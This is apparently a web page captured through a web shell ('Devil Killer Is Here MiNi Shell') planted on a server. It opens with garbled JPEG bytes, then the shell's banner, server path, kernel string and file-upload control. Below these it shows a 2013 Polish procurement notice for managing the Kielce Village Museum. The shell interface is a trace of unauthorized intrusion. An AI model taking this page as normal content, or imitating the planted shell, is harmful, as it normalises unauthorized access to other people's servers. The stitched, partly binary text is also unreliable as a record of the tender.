JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130509/70257-N-2013.html

<p class="kh_header"><b>Kielce: Usługa zarządzania Muzeum Wsi Kieleckiej w Kielcach - 
Instytucją kultury wpisaną do rejestru instytucji kultury prowadzonego przez
Województwo Świętokrzyskie pod numerem RIK 5/92</b><br>
<b>Numer ogłoszenia: 70257 - 2013; data zamieszczenia: 09.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zarządzania Muzeum Wsi Kieleckiej w Kielcach - 
Instytucją kultury wpisaną do rejestru instytucji kultury prowadzonego przez
Województwo Świętokrzyskie pod numerem RIK 5/92.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wyłonienie wykonawcy świadczącego usługi polegające na Zarządzaniu Muzeum Wsi Kieleckiej (dalej w skrócie MWK) w Kielcach - instytucją kultury wpisaną do rejestru instytucji kultury prowadzonego przez Województwo Świętokrzyskie pod numerem RIK 5/92.
1.1	Przedmiot zamówienia obejmuje w szczególności:
1.1.1	prowadzenie działalności kulturalnej zgodnej z zakresem działania Muzeum określonym w szczególności w § 3 i 4  Statutu MWK, art. 1 i 2 ustawy z dnia 21 listopada 1996 o muzeach (Dz. U. z 2012 r., poz. 987) oraz ustawą z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej (Dz. U. 2012 r. poz. 406) i działalności gospodarczej określonej w szczególności w § 12 ust. 3 i 4 Statutu MWK z należytą starannością; 
1.1.2	prowadzenie działalności edukacyjnej w formie: konferencji, warsztatów, szkoleń i kursów, lekcji muzealnych, pokazów rzemiosł,  imprez kulturalnych popularyzujących dziedzictwo i  kulturę ludową, wydawnictw i promocji czytelnictwa, udostępniania zbiorów archiwalnych i bibliotecznych, udział w targach i wystawach; 
1.1.3	zarządzanie instytucją i reprezentowanie jej na zewnątrz, w tym składanie i przyjmowanie oświadczeń woli w imieniu instytucji kultury;
1.1.4	wykonywanie obowiązków, o których mowa w § 9 ust. 2 oraz § 12 ust. 5 Statutu MWK; 
1.1.5	prowadzenie działalności zgodnie z przepisami prawa powszechnie obowiązującego, w tym między innymi:
1.1.5.1	ustawą  z dnia 25 października 1991 r. o organizowaniu i prowadzeniu działalności kulturalnej,
1.1.5.2	ustawą z dnia 27 sierpnia 2009 r. o finansach publicznych,
1.1.5.3	ustawą z dnia 29 września 1994 r. o rachunkowości,
1.1.5.4	ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
1.1.5.5	ustawą  z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych;
1.1.6	prowadzenie działalności w sposób efektywny, oszczędny  i terminowy;
1.1.7	gospodarowanie środkami finansowymi i terminowe regulowanie zobowiązań instytucji kultury; 
1.1.8	prowadzenie zadań inwestycyjnych i prorozwojowych instytucji kultury, postępowań o udzielanie zamówień publicznych itp.;
1.1.9	współpraca z zamawiającym i podległymi mu jednostkami Urzędu Marszałkowskiego oraz Radą MWK;
1.1.10	wypełnienie pełnego zakresu powinności i obowiązków opisanych szczegółowo we wzorze umowy stanowiącym integralną część SIWZ;
1.2	MWK pokrywa koszty bieżącej działalności i zobowiązania z uzyskiwanych przychodów, które pochodzą z następujących źródeł:
1.2.1	wpływów z działalności statutowej;
1.2.2	dotacji podmiotowej oraz dotacji celowych przekazywanych przez Zamawiającego;
1.2.3	innych dotacji;
1.2.4	środków otrzymanych od osób fizycznych i prawnych;
1.2.5	wpływów uzyskanych z najmu i dzierżawy składników majątkowych;
1.2.6	innych źródeł;
1.3	MWK może prowadzić jako dodatkową działalność gospodarczą, zgodnie 
z obowiązującymi przepisami. Przychody uzyskane z dodatkowej działalności gospodarczej przeznaczone będą na realizację działalności statutowej MWK; 
1.4	W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do wykonania usługi polegającej na strategicznym i bieżącym zarządzaniu MWK, realizowanym 
w sposób ciągły i nieprzerwany, w okresie przewidzianym w zamówieniu, a także między innymi:
1.4.1	opracowania i wdrożenia Programu działania MWK w okresie realizacji zamówienia, obejmującego program działalności merytorycznej;
1.4.2	pozyskiwania środków ze źródeł innych niż budżet zamawiającego i dążenie do zmniejszania udziału przychodów MWK z dotacji pochodzących z budżetu zamawiającego w ogólnych przychodach MWK; 
1.4.3	prowadzenie współpracy z instytucjami, organizacjami, szkołami i uczelniami, związkami twórczymi oraz innymi podmiotami;
1.4.4	nawiązanie i rozwój sieci partnerstw z podmiotami prowadzącymi działalność zbliżoną do działalności statutowej MWK;
1.4.5	promocja MWK oraz prowadzonej przez nią działalności;
1.5	Wykonawca zobowiązany będzie do ubezpieczenia od odpowiedzialności cywilnej umowy zawartej z zamawiającym i przedłożenia Zamawiającemu polisy ubezpieczenia umowy od odpowiedzialności cywilnej na kwotę wynikającą z wartości brutto zawartej umowy w terminie do 14 dni liczonych od dnia zawarcia umowy;
1.6	Informacje niezbędne dla oceny zakresu przedmiotu zamówienia i oszacowania ceny oferty zawarte zostały w Załączniku nr 1 do SIWZ (1 plik w formacie PDF zawierający 36 stron);.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia przez Wykonawców wadium, którego wysokość ustalona została na kwotę 10 000,00 zł. (słownie złotych: Dziesięć tysięcy 00/100).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1	pieniądzu;
2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2.3	gwarancjach bankowych;
2.4	gwarancjach ubezpieczeniowych;
2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium musi być wniesione przez Wykonawców przed upływem terminu wyznaczonego do składania ofert. 
4.	W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto Zamawiającego (moment uznania konta Zamawiającego).
5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego wg danych: 
5.1	Nazwa banku i nr konta zamawiającego: 
Getin Noble Bank, 	45 1560 0013 2536 2450 5776 0005
5.2	Nazwa i adres zamawiającego: Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego,  al. IX Wieków Kielc 3, 25-516 Kielce
6.	Tytuł wpłaty: Wadium - przetarg nieograniczony na usługę Zarządzania Muzeum Wsi Kieleckiej w Kielcach 
7.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
8.	Wadium wnoszone w formach, o których mowa w pkt 2 ppkt 2.2 - 2.5 musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę na cały okres, na jaki wykonawca jest związany ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe zobowiązanie poręczyciela lub gwaranta wypłacenia zamawiającemu, na pierwsze jego żądanie, kwoty wadium w przypadkach, o których mowa w art. 46 ust. 4a i 5 ustawy (pkt 14 niniejszego rozdziału). Dokument może zostać załączony do oferty lub może zostać złożony w oddzielnej kopercie w siedzibie zamawiającego, pok. 147, przed upływem terminu wyznaczonego do składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
 1.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.1.2.	posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.1.3.	dysponują odpowiednim potencjałem technicznym do wykonania zamówienia. Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 
1.1.3.	dysponują osobami zdolnymi do wykonania zamówienia i w powyższym zakresie wykażą, iż dysponują co najmniej jedną osobą zdolną do wykonania zamówienia (osoby przewidziane do realizacji zamówienia), która:
1.1.3.1.	posiada wykształcenie wyższe magisterskie: 
1.1.3.1.1. w zakresie etnografii, historii, kulturoznawstwa, muzealnictwa, zarządzania kulturą, pedagogiki kulturalno-oświatowej lub animacji kultury,  
lub
1.1.3.1.2.	w zakresie zarządzania, ekonomii, prawa i administracji uzupełnione studiami podyplomowymi lub doktoranckimi w zakresie etnografii, historii, kulturoznawstwa, muzealnictwa, zarządzania kulturą, pedagogiki kulturalno-oświatowej lub animacji kultury;
1.1.3.2.	posiada pełną zdolność do czynności prawnych i korzysta w pełni z praw publicznych,
1.1.3.3.	nie była karana za przestępstwo lub przestępstwo skarbowe i nie jest prowadzone przeciwko niej postępowanie o przestępstwo ścigane 
z oskarżenia publicznego lub przestępstwo skarbowe,
1.1.3.4.	posiada co najmniej 8-letni staż pracy, w tym co najmniej 3-letni staż pracy na stanowisku kierownika samorządowego lub państwowego muzeum albo innej samorządowej lub państwowej instytucji kultury, z budżetem rocznym na działalność operacyjną co najmniej 3 mln złotych średniorocznie w roku poprzedzającym rok wszczęcia postępowania 
o udzielenie zamówienia,
1.1.3.5.	posiada doświadczenie w zakresie zarządzania projektami lub zarządzania instytucją kultury, która zrealizowała lub realizuje projekty inwestycyjne dotyczące budowy, rozbudowy i modernizacji obiektów infrastruktury kultury ze środków budżetu państwa, funduszy strukturalnych Unii Europejskiej, Norweskiego Mechanizmu Finansowego i Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego, o wartości ogólnej minimalnej 5 mln złotych w okresie 3 lat przed dniem składania ofert,
1.1.3.6.	posiada doświadczenie w zakresie realizacji zadań z zakresu kultury lub zarządzania samorządową lub państwową instytucją kultury, która 
w ostatnim roku przed dniem składania ofert zrealizowała zadania 
z zakresu kultury takie jak: 
1.1.3.6.1.	urządzanie wystaw czasowych - min. liczba wystaw/ekspozycji czasowych -  4,
1.1.3.6.2.	udostępnianie zbiorów - min. liczba osób odwiedzających instytucję 50.000,
1.1.3.6.3.	prowadzenie działalności edukacyjnej - min. liczba lekcji/warsztatów muzealnych - 50,
1.1.3.6.4.	imprezy kulturalne popularyzujące materialne i niematerialne dziedzictwo kulturowe - 5 imprez o frekwencji łącznej min. 5.000 uczestników,
1.1.3.6.5.	działalność naukowa, badawcza i wydawnicza,
1.1.3.6.6.	działalność archiwalna i biblioteczna.
Zamawiający oceni spełnienie warunków udziału w postępowaniu wg zasady spełnia/nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy oraz Wykazu osób, o którym mowa w pkt III.4.1) ogłoszenia oraz w rozdziale VI lit. A SIWZ (pkt. 2)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ, będącego integralną częścią SIWZ. 
2.	Program działania Muzeum WSI Kielcekiej w Kielcach - sporządzony i podpisany przez wykonawcę dokument spełniający wymagania zamawiającego wskazane w rozdziale III pkt. 1.7. i w rozdziale XIII pkt 4 SIWZ. Dokument ten stanowić będzie podstawę do przyznania punktów badanym ofertom, zgodnie ze schematem opisanym w rozdziale XIII SIWZ. 
3.	W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
4.	Pełnomocnictwo określające jego zakres - w przypadku, gdy wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona notarialnie kopia).
UWAGA:
Wykonawca, który będzie polegać na osobie lub osobach zdolnych do wykonania zamówienia udostępnionych od innych podmiotów, niezależnie od charakteru prawnego łączących do z nimi stosunków (art. 26 ust. 2b), zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - oryginał.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Program działania Muzeum - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidywane istotne zmiany umowy zawarte zostały w dodatku nr 5 do SIWZ - Wzór umowy, w szczególności są to poniższe zmiany: 
1. W okresie trwania  umowy wynagrodzenie należne Wykonawcy jest niezmienne, z tym zastrzeżeniem, że na mocy porozumienia Stron może ulec obniżeniu 
w każdej chwili, zaś podwyższone może zostać w drodze porozumienia Stron, na wniosek Wykonawcy, w razie ustawowej zmiany podatku VAT należnego od wynagrodzenia, nie wcześniej niż z dniem wejścia w życie aktu prawnego wprowadzającego zmianę. W tym ostatnim przypadku dostosowaniu do nowej stawki podatku VAT będzie podlegało jedynie wynagrodzenie brutto, przy niezmienności wynagrodzenia netto.
2. Strony dopuszczają możliwość zmiany umowy po uprzednim sporządzeniu protokołu konieczności, przy zachowaniu ryczałtowego charakteru ceny umowy, poprzez podpisanie aneksu do umowy, w przypadku zmiany terminu realizacji przedmiotu umowy, poprzez jego skrócenie w przypadku zgodnej woli Stron,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.sejmik.kielce.pl<br>
